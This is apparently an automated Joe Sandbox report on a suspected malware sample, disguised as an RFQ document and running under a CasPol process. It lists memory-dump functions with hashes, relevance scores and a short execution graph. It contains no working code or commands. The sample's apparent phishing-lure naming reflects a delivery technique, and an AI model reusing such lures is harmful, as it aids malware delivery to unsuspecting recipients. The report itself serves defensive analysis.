                                                                                            • Opcode ID: 8b838600537129920ebc77a39f3923ae7630fcd9019a1f42718846e9c2a49ac8
                                                                                            • Instruction ID: 4e8a350228fb82f91b304f02afba73156d36fa8656ef73a651a31e0c12bb40d2
                                                                                            • Opcode Fuzzy Hash: 8b838600537129920ebc77a39f3923ae7630fcd9019a1f42718846e9c2a49ac8
                                                                                            • Instruction Fuzzy Hash: 52214C31E1C60E8FDB54EF99D8416FE77F1EB49350F10013AE519E2280EB3869558BD5
                                                                                            Function 00007FF848F13828 Relevance: .1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7726870677601f52a809ae03d4a29b173a08e22bc752f1469aaa21303bcedbf6
                                                                                            • Instruction ID: 03be0d13ccc0897e4b6768181b296364dd7914c56c2c181c01955f24343f933e
                                                                                            • Opcode Fuzzy Hash: 7726870677601f52a809ae03d4a29b173a08e22bc752f1469aaa21303bcedbf6
                                                                                            • Instruction Fuzzy Hash: C4110871B1C5581FDB2CAD78885A03777DBE3DA260B51D33EE597C22D6DD64680341C4
                                                                                            Function 00007FF848F02292 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca10220e19d0df0595959c2377e79583dc76fed73ee6d28e0cd11df730777cc7
                                                                                            • Instruction ID: 4d227e9f463323d51c7e983d8b0c7e26119343e10adf237938bd0ff54ec653dd
                                                                                            • Opcode Fuzzy Hash: ca10220e19d0df0595959c2377e79583dc76fed73ee6d28e0cd11df730777cc7
                                                                                            • Instruction Fuzzy Hash: 4321F63180EACA5FE783AB7488691F97FF1EF57250F0505E7D448CB1A3DA281949C321
                                                                                            Function 00007FF848F07B40 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75dee9890610fed06d817b4b9114b7bebe477b33264e4c9120365151772b8f07
                                                                                            • Instruction ID: e68bf2a89df36598687d768992a93ccfcfcede213026c47390de7b3d184c383b
                                                                                            • Opcode Fuzzy Hash: 75dee9890610fed06d817b4b9114b7bebe477b33264e4c9120365151772b8f07
                                                                                            • Instruction Fuzzy Hash: 4711A33060EA094FD769EB28D49497A73E1EF99355F50063EE44EC32A5EF28A8418745
                                                                                            Function 00007FF848F054D3 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9d394e4af8a5c9b7cf8d6bf9c7de9262933cfe0443f302e5b70cc0b9a1da9b8b
                                                                                            • Instruction ID: 1646bfa7aa8debb752d6f5f8a4f41ac0dbbfd0ed9bfd12678e0582082f6f6c25
                                                                                            • Opcode Fuzzy Hash: 9d394e4af8a5c9b7cf8d6bf9c7de9262933cfe0443f302e5b70cc0b9a1da9b8b
                                                                                            • Instruction Fuzzy Hash: AA014431B189174BE718BB2CA8520BA73D2EBC4311B44463AC89AD72E2DF28EC424384
                                                                                            Function 00007FF848F00848 Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 91cbe01ae2dcad4b4b14303100d288e744de6dcc1e088a2c13e7b9a002fab874
                                                                                            • Instruction ID: ca03edb80ed0fa0dd2f0dff3df0d90898ee6302688862fce1b53f20935fd152f
                                                                                            • Opcode Fuzzy Hash: 91cbe01ae2dcad4b4b14303100d288e744de6dcc1e088a2c13e7b9a002fab874
                                                                                            • Instruction Fuzzy Hash: 3C01FC53D0F9C15EF7A5732C28961BC2EC0EF53198F1904BAD988861D7EE0C18429387
                                                                                            Function 00007FF848F13918 Relevance: .1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86ac7d22e72876932c9cefbebae8fae265fed3344e07282e09b7d8d225e33e6e
                                                                                            • Instruction ID: f26bc2e17ddfa4b06a8d44f31c83b44029d7f286d4e03936f6ba49517e05dec9
                                                                                            • Opcode Fuzzy Hash: 86ac7d22e72876932c9cefbebae8fae265fed3344e07282e09b7d8d225e33e6e
                                                                                            • Instruction Fuzzy Hash: 4401923071C6458FCB0CAB18C55557A73E7E7D6311F60863DD487CA3D5CA38A806C784
                                                                                            Function 00007FF848F0BB91 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d425e6ce4b73072eb8979aeeaec758f899c0379a1e3855b12570cdbed6849b2d
                                                                                            • Instruction ID: 6a1c9d0198b46a5937f88d90674fb33abf617b7df73f2c85362f73dcc9c6b066
                                                                                            • Opcode Fuzzy Hash: d425e6ce4b73072eb8979aeeaec758f899c0379a1e3855b12570cdbed6849b2d
                                                                                            • Instruction Fuzzy Hash: 3FF0F63151DE894FC776E73C98505627BF1EFA931070906ABD09AC36A6DE29EC46C380
                                                                                            Function 00007FF848F12B55 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3a76191013b68861c557e5c6765a5fcebdbea4f091085f43fb63448c19765fb
                                                                                            • Instruction ID: 13e9085b0c6f6c5e8dd0532bf235503ff751c9b46a7f51a91bc1aa8ae8d81964
                                                                                            • Opcode Fuzzy Hash: b3a76191013b68861c557e5c6765a5fcebdbea4f091085f43fb63448c19765fb
                                                                                            • Instruction Fuzzy Hash: 05F05E72B5DE090FA28CBA4C78562B873C0E799761F40017FE44EC3297ED5A6C434289
                                                                                            Function 00007FF848F063F0 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 367fcb5fb85efc002ba39b0d921e7a4895aa6d041cc58e348952d90460137940
                                                                                            • Instruction ID: d8ccd6811ea7afc5d3dcfb7d3f5866876d62a6d220f9a0968b594a8667221703
                                                                                            • Opcode Fuzzy Hash: 367fcb5fb85efc002ba39b0d921e7a4895aa6d041cc58e348952d90460137940
                                                                                            • Instruction Fuzzy Hash: 71018639A1C64E8FEB50EF44D8406EA77A1FF85344F400136E40C9A1C5EB39AAA5CB80
                                                                                            Function 00007FF848F02089 Relevance: .0, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b5518f6998d98c5da8a555ff062fa5dcfa7c92289a04beb19695ce0ed71d7f12
                                                                                            • Instruction ID: 612be0b1bd0d4472924ce9f94564f8f22ffb132f053b4a28363eff3de9baa61e
                                                                                            • Opcode Fuzzy Hash: b5518f6998d98c5da8a555ff062fa5dcfa7c92289a04beb19695ce0ed71d7f12
                                                                                            • Instruction Fuzzy Hash: 66F0E931A1DB884FC749B73C58191983BE0EF5B251B4901F7E008CB2E3EA28DC408356
                                                                                            Function 00007FF848F01E10 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06cb759eaf8b604ac5b25c027bad010d286b085d6ea63523500f7e57b09f705c
                                                                                            • Instruction ID: 92d5c0c13253475eafebaddf8d82260d43b495fe9e2c06253322d7303d13f5de
                                                                                            • Opcode Fuzzy Hash: 06cb759eaf8b604ac5b25c027bad010d286b085d6ea63523500f7e57b09f705c
                                                                                            • Instruction Fuzzy Hash: B3F08235618D0D4FC6B4EA2C944496273E1EB98310715066AD45AC3668DF24E8418780
                                                                                            Function 00007FF848F1333D Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ffdadd5829b555f222ecc106774fa7d29a365505da76cbc7c9be3b4dd90dae07
                                                                                            • Instruction ID: 70460ff0d8d0199f2dc9f01cd3683af742d43cfedf98b3d9bd923d717c060cd0
                                                                                            • Opcode Fuzzy Hash: ffdadd5829b555f222ecc106774fa7d29a365505da76cbc7c9be3b4dd90dae07
                                                                                            • Instruction Fuzzy Hash: 1DF02431F0C50A4FD728EE6C98908B67393D790390F04423EC007C72C5DE28B9458244
                                                                                            Function 00007FF848F12ACE Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8940f38400b9d4657889e4f164820048c729980c875fe724e594bc6dcfa33bb
                                                                                            • Instruction ID: daaed9bf8b3063ea232247ee96218a8f0d4f41f9dac249329da7214af062fcf5
                                                                                            • Opcode Fuzzy Hash: c8940f38400b9d4657889e4f164820048c729980c875fe724e594bc6dcfa33bb
                                                                                            • Instruction Fuzzy Hash: E6F0273070C50A4FC60CE95889964797247E7D9740B10C37ED44B862EAEE746C1786C5
                                                                                            Function 00007FF848F0A869 Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f72c553f9f002a201d115994aeb7561a3a8d1e592e63e1020d390b234667ba8e
                                                                                            • Instruction ID: f98c3d65dbe3e7629124bb2a2efcf14cb081de5c8711fbd1e438ce2d7009c2f4
                                                                                            • Opcode Fuzzy Hash: f72c553f9f002a201d115994aeb7561a3a8d1e592e63e1020d390b234667ba8e
                                                                                            • Instruction Fuzzy Hash: 60E0D832F0DC0A4FE398E6AE7CD81B053C1E799261B580176D00DC72C5FD085C864358
                                                                                            Function 00007FF848F0B372 Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 65eeb7cc31a9f3c6edcf8d1e9cfce4adaf4f60fa6d0f8a5167bcc4edc6202721
                                                                                            • Instruction ID: f5bcc8bab1060b6b6c10a9f9a68d918ac14c6ec2f14bd397c8b98107ab414a90
                                                                                            • Opcode Fuzzy Hash: 65eeb7cc31a9f3c6edcf8d1e9cfce4adaf4f60fa6d0f8a5167bcc4edc6202721
                                                                                            • Instruction Fuzzy Hash: 25E0D132B1DD550FF354673CA8551B4B6D0FB8A219B2445FFD489C31E6ED1A9983C344
                                                                                            Function 00007FF848F020A0 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4b02c4a82e987a1fc9cccfd12ada405fef7ed4666e617cc7ce8654a8a9dd6208
                                                                                            • Instruction ID: 41f4ac9a92780f6003155a2e6cccf01c9f5efd90de6dbd6dffc1addebc891920
                                                                                            • Opcode Fuzzy Hash: 4b02c4a82e987a1fc9cccfd12ada405fef7ed4666e617cc7ce8654a8a9dd6208
                                                                                            • Instruction Fuzzy Hash: 12E04F30B1990C4FCB98B73CA8095A832D1DF9A351B4415B5F40DC7296ED28DC814385
                                                                                            Function 00007FF848F13083 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 176574feb851112b73e6d8bbb1347b6892d9b38d6409b8d4916e8785aee5e8a9
                                                                                            • Instruction ID: c3a4cc3941afbcb511224fbab55976088612cd3cec36605c764d58adc9166c8c
                                                                                            • Opcode Fuzzy Hash: 176574feb851112b73e6d8bbb1347b6892d9b38d6409b8d4916e8785aee5e8a9
                                                                                            • Instruction Fuzzy Hash: C9E02B71B1C2065FD708FB1CC5410F973D6D799319F10853AD48AD62D5D92CE8424246
                                                                                            Function 00007FF848F1362D Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d54bdcc2e0dd7bdf5072320c9e209df687cf00a498092bb664c99ed7d92dd773
                                                                                            • Instruction ID: e7abab3d4c0cd853929658e9b931cbb5008f1dbfb19c9651d5ecbfecaf685942
                                                                                            • Opcode Fuzzy Hash: d54bdcc2e0dd7bdf5072320c9e209df687cf00a498092bb664c99ed7d92dd773
                                                                                            • Instruction Fuzzy Hash: 75F0E5347086034FD31CEB18C1904AAB393FBD9351B20863AC1428B3E8DD78A846C688
                                                                                            Function 00007FF848F008CD Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 62ad0618e0f2f397e804f7210cf2fad93d8ad93396e57afab9df9001f9ee05f0
                                                                                            • Instruction ID: e7db192508fa9f52bd34f188319b30771dfdad90379817c151df4c07aeb9ca18
                                                                                            • Opcode Fuzzy Hash: 62ad0618e0f2f397e804f7210cf2fad93d8ad93396e57afab9df9001f9ee05f0
                                                                                            • Instruction Fuzzy Hash: 6EE09B65D0D9950FD3A5B32C04651787A90EF86654F5500EFC549CB1D3EA045C094389
                                                                                            Function 00007FF848F01FF0 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 33552d1e25960ce2add880c936a9c003dcc41d64dd981cfb61c59dee615e75dc
                                                                                            • Instruction ID: 6f315d0a9612d1781e0ec5e3409939778b4b477830f3d051e0e7da43d69ea67a
                                                                                            • Opcode Fuzzy Hash: 33552d1e25960ce2add880c936a9c003dcc41d64dd981cfb61c59dee615e75dc
                                                                                            • Instruction Fuzzy Hash: EFE01A3194E7C90FD713677468205967F74AF43104F0A40E7E4A8CB0E3EA586A68C366
                                                                                            Function 00007FF848F05330 Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 780eae8080742d4bab3725343003a01ed318a01eb725264d2e27c80bc31fcb94
                                                                                            • Instruction ID: 6013e392c3a2185b325de1e937ca835fcde383c5c7d3d6400eb49acc1b76684c
                                                                                            • Opcode Fuzzy Hash: 780eae8080742d4bab3725343003a01ed318a01eb725264d2e27c80bc31fcb94
                                                                                            • Instruction Fuzzy Hash: F8D0C23080E6459FC344AB208451514B7A0FF86240F9045A9E4048B284D23D54949741
                                                                                            Function 00007FF848F13A37 Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cd3f5909fb219681108f672e8eb12f7e48beb80aa57092f8af953e40960ae55
                                                                                            • Instruction ID: 345154f71c5090ac9793a6fa4891a25e8dbbcaba646dae64bf06e1ede51524a4
                                                                                            • Opcode Fuzzy Hash: 3cd3f5909fb219681108f672e8eb12f7e48beb80aa57092f8af953e40960ae55
                                                                                            • Instruction Fuzzy Hash: 53E08C3102C7828FC348FB18C08257ABBA0BB4A354F20186EE1CBCA0A2CA28F410C646
                                                                                            Function 00007FF848F13954 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 92689a7519af97a9a2111b6acd8aa02426bf67ca79491fd2bb6dcfc78fcdba5b
                                                                                            • Instruction ID: b084f774829d17dd85ed299202a025b5bd6bb1ebda778e539a8f6ef708193c2f
                                                                                            • Opcode Fuzzy Hash: 92689a7519af97a9a2111b6acd8aa02426bf67ca79491fd2bb6dcfc78fcdba5b
                                                                                            • Instruction Fuzzy Hash: 50D0A93206DA008FE20CEB2488811A7B296BB5A240F20A43EE0C7C2182EE20F4018705

                                                                                            Non-executed Functions

                                                                                            Function 00007FF848F090D4 Relevance: 2.1, Strings: 1, Instructions: 876COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H
                                                                                            • API String ID: 0-2852464175
                                                                                            • Opcode ID: dd2c7c2c20382f1c9c6171ce413e1220c0af11f2f6505dcebcdbb3ce2d61931d
                                                                                            • Instruction ID: 7c30c2db3816bfed3cfa5a3311649a731ff2ca68c3b0d95ebdba11f12074232b
                                                                                            • Opcode Fuzzy Hash: dd2c7c2c20382f1c9c6171ce413e1220c0af11f2f6505dcebcdbb3ce2d61931d
                                                                                            • Instruction Fuzzy Hash: E922786699E7D64FE31367705C380A07FB1AE23991B1E41EBC1D4CB5E3E64E180AC726

                                                                                            Execution Graph

                                                                                            Execution Coverage:16.1%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:27
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph 11877 6e0848 11878 6e0856 11877->11878 11881 6e1251 11878->11881 11882 6e128b 11881->11882 11883 6e13c2 11882->11883 11889 6e1862 11882->11889 11893 6e1870 11882->11893 11884 6e1432 11883->11884 11887 6e1862 KiUserExceptionDispatcher 11883->11887 11888 6e1870 KiUserExceptionDispatcher 11883->11888 11887->11884 11888->11884 11890 6e1893 11889->11890 11891 6e18ba KiUserExceptionDispatcher 11890->11891 11892 6e1897 11890->11892 11891->11892 11892->11882 11894 6e1893 11893->11894 11895 6e18ba KiUserExceptionDispatcher 11894->11895 11896 6e1897 11894->11896 11895->11896 11896->11882 11897 6e0871 11900 6e08d8 11897->11900 11898 6e0889 11901 6e08fa 11900->11901 11905 6e0ce0 11901->11905 11909 6e0ce8 11901->11909 11902 6e093e 11902->11898 11906 6e0d26 GetConsoleWindow 11905->11906 11908 6e0d56 11906->11908 11908->11902 11910 6e0d26 GetConsoleWindow 11909->11910 11912 6e0d56 11910->11912 11912->11902

                                                                                            Executed Functions

                                                                                            Function 006E0CE0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1719 6e0ce0-6e0d54 GetConsoleWindow 1722 6e0d5d-6e0d82 1719->1722 1723 6e0d56-6e0d5c 1719->1723 1723->1722
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2220001097.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6e0000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2863861424-0
                                                                                            • Opcode ID: 43b97710f2aa0ae5cc899de059f473e471d2e4854cbb2837f2548aa86ca6043e
                                                                                            • Instruction ID: 28b1dae695e1c86353960502524a17a9366c28d709ec16f1525a9478f8fe0271
                                                                                            • Opcode Fuzzy Hash: 43b97710f2aa0ae5cc899de059f473e471d2e4854cbb2837f2548aa86ca6043e
                                                                                            • Instruction Fuzzy Hash: 471146759042498FDB20DFAAD8457EEFFF1EF48314F20885AC419A7240C779A585CBA0
                                                                                            Function 006E1870 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 006E18BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2220001097.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6e0000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: a89cda0a5bcf3486da076e03013860ec393e5cc8b038bc3af31139c8d03943cd
                                                                                            • Instruction ID: a3275d80f76c3eb9f620a51a3e4ac7d34be2d077bc3982bbe6dd244eab7a24f0
                                                                                            • Opcode Fuzzy Hash: a89cda0a5bcf3486da076e03013860ec393e5cc8b038bc3af31139c8d03943cd
                                                                                            • Instruction Fuzzy Hash: 58011E71F002158FCB44EFB9D81459EB7F6EF8961471148A5E509EB360EB349D028B91
                                                                                            Function 006E0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1727 6e0ce8-6e0d54 GetConsoleWindow 1730 6e0d5d-6e0d82 1727->1730 1731 6e0d56-6e0d5c 1727->1731 1731->1730
                                                                                            APIs
                                                                                            Memory Dump Source
